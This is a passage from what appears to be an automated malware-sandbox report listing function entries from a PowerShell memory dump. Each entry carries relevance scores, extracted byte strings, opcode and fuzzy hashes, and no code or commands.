                                  • API String ID: 0-1978863864
                                  • Opcode ID: 28e793ea4254db67bad06c4316c1c9cf7c624c3119c58db4637eb225b4fb4004
                                  • Instruction ID: d984dcf6163baf0e58f1622b189c0ab104ec4ba722f4ab8a6357bf53af418db0
                                  • Opcode Fuzzy Hash: 28e793ea4254db67bad06c4316c1c9cf7c624c3119c58db4637eb225b4fb4004
                                  • Instruction Fuzzy Hash: CCF114B178430ADFEB148F68D8047BABFA2EF85311F5484AAE815CB291DB31D855C7B1
                                  Function 07B14B68 Relevance: 5.3, Strings: 4, Instructions: 280COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 84#l$84#l$tP^q$tP^q
                                  • API String ID: 0-2805872942
                                  • Opcode ID: b800019a22a2ff2224d9ae1421a92e3686e45c7131d03763c93526175a0f9e78
                                  • Instruction ID: 7c78c979e94bf97463ac90d5b4ee65d244c4e1af49f1b0e2fe2c69aa24666300
                                  • Opcode Fuzzy Hash: b800019a22a2ff2224d9ae1421a92e3686e45c7131d03763c93526175a0f9e78
                                  • Instruction Fuzzy Hash: B5914AF1B002869FDB189F698844B7ABBE6EF85710F6884AAD805DF395CA31CC45C791
                                  Function 07B100F0 Relevance: 5.3, Strings: 4, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$XY%l$XY%l
                                  • API String ID: 0-2254435231
                                  • Opcode ID: b0b09893d5a79c8b4e92d0b9b5c53f2820e6ab637f2415ae51bd35b5d992d56f
                                  • Instruction ID: 4b13cbc137de7dfc4f49989dd1ca5b61ab64a4c3f4896c5d10b25e22d0f635d2
                                  • Opcode Fuzzy Hash: b0b09893d5a79c8b4e92d0b9b5c53f2820e6ab637f2415ae51bd35b5d992d56f
                                  • Instruction Fuzzy Hash: 46816DF1B0430A8FE710AB69990466AFBE2EFC6210F6884FBD505CB255EA35C8D5C391
                                  Function 07B17568 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (f%l$(f%l$(f%l$(f%l
                                  • API String ID: 0-3942150577
                                  • Opcode ID: f311402746d9d4686c212ba3d14c61b49fce345081dfdfad7afac199df44f0c6
                                  • Instruction ID: 3761d37c486dd5be1ebffb374d9af4990027cf5b914559e5faee63f8c997fb51
                                  • Opcode Fuzzy Hash: f311402746d9d4686c212ba3d14c61b49fce345081dfdfad7afac199df44f0c6
                                  • Instruction Fuzzy Hash: 00718EF4A00209DFEB14CF58C451A6ABBB2FF89314F5481A9D805AB765DF32DC81CB91
                                  Function 07B11BB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $^q$$^q$$^q$$^q
                                  • API String ID: 0-2125118731
                                  • Opcode ID: 1f716c69f145afef8cf2bae66cbeb2b4ea6f5a9162541d84edcb499dba10a7ad
                                  • Instruction ID: fdcf6066e1f72008b41897e89522dd67a270615ae75bba9127f5146fab06d4a0
                                  • Opcode Fuzzy Hash: 1f716c69f145afef8cf2bae66cbeb2b4ea6f5a9162541d84edcb499dba10a7ad
                                  • Instruction Fuzzy Hash: 9C2147F130430E5BEB385A7E8804B27B7DA9BC1710F64847AAA05CF385DD76C884C361
                                  Function 07B11A39 Relevance: 5.1, Strings: 4, Instructions: 59COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2708841117.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_7b10000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'^q$4'^q$$^q$$^q
                                  • API String ID: 0-2049395529
                                  • Opcode ID: 8542707e473c4f2794695062db750c89ca208ad59e634aa469c5cc7827da2f05
                                  • Instruction ID: 4f67f1031c8e1328a3348a9d2f36fb783ce975e3e10f8c99dc48776f3ee40a23
                                  • Opcode Fuzzy Hash: 8542707e473c4f2794695062db750c89ca208ad59e634aa469c5cc7827da2f05
                                  • Instruction Fuzzy Hash: BC01D4A1B2D3DE4FD72A022C18241666FB29FC391076944DBD250CF35ACD198D4A83E3